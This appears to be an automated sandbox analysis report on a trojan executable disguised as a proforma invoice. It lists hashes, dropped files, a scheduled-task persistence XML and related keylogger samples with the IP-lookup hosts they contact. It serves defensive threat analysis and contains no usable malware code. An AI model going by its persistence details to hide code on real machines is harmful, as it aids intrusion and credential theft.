158.101.44.242	checkip.dyndns.com	United States		31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1557908
Start date and time:	2024-11-18 18:17:39 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PROFORMA + PENDENTES.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@33/15@3/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 98% Number of executed functions: 216 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target PROFORMA + PENDENTES.exe, PID 3636 because it is empty
Execution Graph export aborted for target WYqxTmjfOgdZ.exe, PID 5420 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: PROFORMA + PENDENTES.exe

Simulations

Behavior and APIs

Time	Type	Description
12:18:37	API Interceptor	98x Sleep call for process: PROFORMA + PENDENTES.exe modified
12:18:42	API Interceptor	32x Sleep call for process: powershell.exe modified
12:18:44	API Interceptor	104x Sleep call for process: WYqxTmjfOgdZ.exe modified
18:18:44	Task Scheduler	Run new task: WYqxTmjfOgdZ path: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	PO 20495088.exe	Get hash	malicious	FormBook	Browse	www.ssrnoremt-rise.sbs/3jsc/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/zWkbOqX7/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	gusetup.exe	Get hash	malicious	Unknown	Browse	www.glarysoft.com/update/glary-utilities/pro/pro50/
	Online Interview Scheduling Form.lnk	Get hash	malicious	Ducktail	Browse	gmtagency.online/api/check
	View Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htm	Get hash	malicious	Unknown	Browse	f7xiz.nhgrt.top/Kbo731/96f7xiZ96?&&V5G=YW5kZXJzLmhhcnR1bmcuY2hyaXN0ZW5zZW5Acm9ja3dvb2wuY29t
	SWIFT 103 202414111523339800 111124.pdf.vbs	Get hash	malicious	Remcos	Browse	paste.ee/d/YU1NN
	TT copy.exe	Get hash	malicious	FormBook	Browse	www.lnnn.fun/u5w9/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/iiEh1iM3/download
	Scan12112024,pdf.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	paste.ee/d/dc8Ru
158.101.44.242	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PO-000041522.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Revised invoice.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 11-18-2024_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	CloudServices.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	SOF-41593-21052024112851.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Company Profile_pdf.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	rPONO17030099.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	New Order_20241711.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
checkip.dyndns.com	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	New Order_20241711.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	MG-Docu6800001.exe	Get hash	malicious	GuLoader	Browse	172.67.208.107
	payload.vbs	Get hash	malicious	Unknown	Browse	172.67.165.138
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse	1.1.1.1
	NoteID [4962398] _Secure_Document_Mrettinger-46568.docx	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	DRP130636747.pdf	Get hash	malicious	Unknown	Browse	104.18.10.207
	gP5rh6fa0S.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	https://t.co/D4HGMmKLnL	Get hash	malicious	Unknown	Browse	162.159.140.229
ORACLE-BMC-31898US	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	PO-000041522.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	z30ProofofPaymentAttached.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	New Order_20241711.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	Fac.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	New Order Data sheet Page.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Factura Honorarios 2024-11-17.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	DHL Packing list.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Enclosed Offer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3

Process:	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1304
Entropy (8bit):	5.342479910699661
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4DRE4mKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHDRHmYHKh3oPtHo6hAHKzP
MD5:	69F4C6D6E1A57244AD636131ED81FDCF
SHA1:	3BC170B8ED30C1968102F43661A91C548A593634
SHA-256:	243AF877C88EEE73B052788B4C8FD440B044D99FA7C9BAE286887A5D1888D6EA
SHA-512:	07A5D721605890AAA7D27531E6597951C74ED2EBA51DF5BFC94C66980E88663AA19D32E662D493BF2BF5062526EB895947FF2EB8F952C81D43191AE2C698A108
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Speech, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WYqxTmjfOgdZ.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1304
Entropy (8bit):	5.342479910699661
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4DRE4mKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHDRHmYHKh3oPtHo6hAHKzP
MD5:	69F4C6D6E1A57244AD636131ED81FDCF
SHA1:	3BC170B8ED30C1968102F43661A91C548A593634
SHA-256:	243AF877C88EEE73B052788B4C8FD440B044D99FA7C9BAE286887A5D1888D6EA
SHA-512:	07A5D721605890AAA7D27531E6597951C74ED2EBA51DF5BFC94C66980E88663AA19D32E662D493BF2BF5062526EB895947FF2EB8F952C81D43191AE2C698A108
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Speech, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379552885213346
Encrypted:	false
SSDEEP:	48:fWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//8M0Uyus:fLHxvCsIfA2KRHmOugw1s
MD5:	08C4BB62AB814866FFEF46F746CB9140
SHA1:	A24D7CCEC57571B1ADD96212CC8EB391982964E9
SHA-256:	BBF508C20A76CD57ADC1E12C9239C6A82F72BC034F3B01AF7F8C3FED34FE0A6B
SHA-512:	B69AA0C4455E7074715844071FE40CC5B4069D8D54AE37AC37762282AEEBEA04A2C3C3385B29ACB11FC8DA6A17D3C4F81BF6DF9AD3AEA3A7EC29255B7CE3D231
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a41imsea.4lc.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eho15iwf.cdu.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fry22dqo.hu3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jmysbgfb.mwn.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mnpdhtg0.q55.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1byb13s.bgf.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yb3owk2l.o5a.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yeyidcty.klj.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp3E72.tmp

Download File

Process:	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1585
Entropy (8bit):	5.123142960937494
Encrypted:	false
SSDEEP:	24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt5Vxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTlv
MD5:	AF0B975FAADFFAE6300682837F087F8C
SHA1:	F7EF947489F2841451D7DF5B345B98A0DD251451
SHA-256:	B75099A2895224ECA8B021C98BEBF31B976B703E78332835943EF7A5D9C73A51
SHA-512:	8499DA722C92AA9038E60BD0C03B15CA3FE0AD238F0759BDF235D7AA9038201E31F7057F05628B53B45B2E1A5932BAFD23E7774189F9F0FD457D0BFFB7629BFB
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmp5B41.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1585
Entropy (8bit):	5.123142960937494
Encrypted:	false
SSDEEP:	24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt5Vxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTlv
MD5:	AF0B975FAADFFAE6300682837F087F8C
SHA1:	F7EF947489F2841451D7DF5B345B98A0DD251451
SHA-256:	B75099A2895224ECA8B021C98BEBF31B976B703E78332835943EF7A5D9C73A51
SHA-512:	8499DA722C92AA9038E60BD0C03B15CA3FE0AD238F0759BDF235D7AA9038201E31F7057F05628B53B45B2E1A5932BAFD23E7774189F9F0FD457D0BFFB7629BFB
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe

Download File

Process:	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	617984
Entropy (8bit):	7.886314439150102
Encrypted:	false
SSDEEP:	12288:fYVqW8F9057V2WnuYJBcw/6oxYP4Tl9SZZGQ4qS6q:rLs0WnuYP6KeokZZGdqbq
MD5:	4D74CEBD8DDAAE78DE8144F1ABB245E5
SHA1:	8E8423E4AF53A91B9750014235773F9EC38916DF
SHA-256:	2A2625E85758DFDC4AB64036BB679F519B8802ECCCDBA37EEC44FB99E68E35A9
SHA-512:	DB4959B2A762416A62FC95FD06C5B5836189EF6E785CFAAAA2E26E28602A8DB2AA71893DD72833490CDF631321AC6C7AB5A168BBF671DFA1BB98AB8C827D3426
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 32%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s.;g..............0..N..........~l... ........@.. ....................................@.................................,l..O.................................................................................... ............... ..H............text....L... ...N.................. ..`.rsrc................P..............@..@.reloc...............l..............@..B................`l......H..........L...........$N..............................................j.(............s....(....&..0.................%.(...+.s....}...........%.(...+.%.(...+.s ...}.....s!...}.....s"...}......{....o#....{....o$....{....o%....{....o&...si...}.....0..4.......s'.....{.....(...+.H...()...r...p(.........(+...t^.....[...%......+(+...t^.....[...(-....%......+(+...t^.....[...(-....(-.........%...(...+o...+o0....{.....(...+.B...()...r...p(......h...(+...t^.....[...%......+(+...t

C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.886314439150102
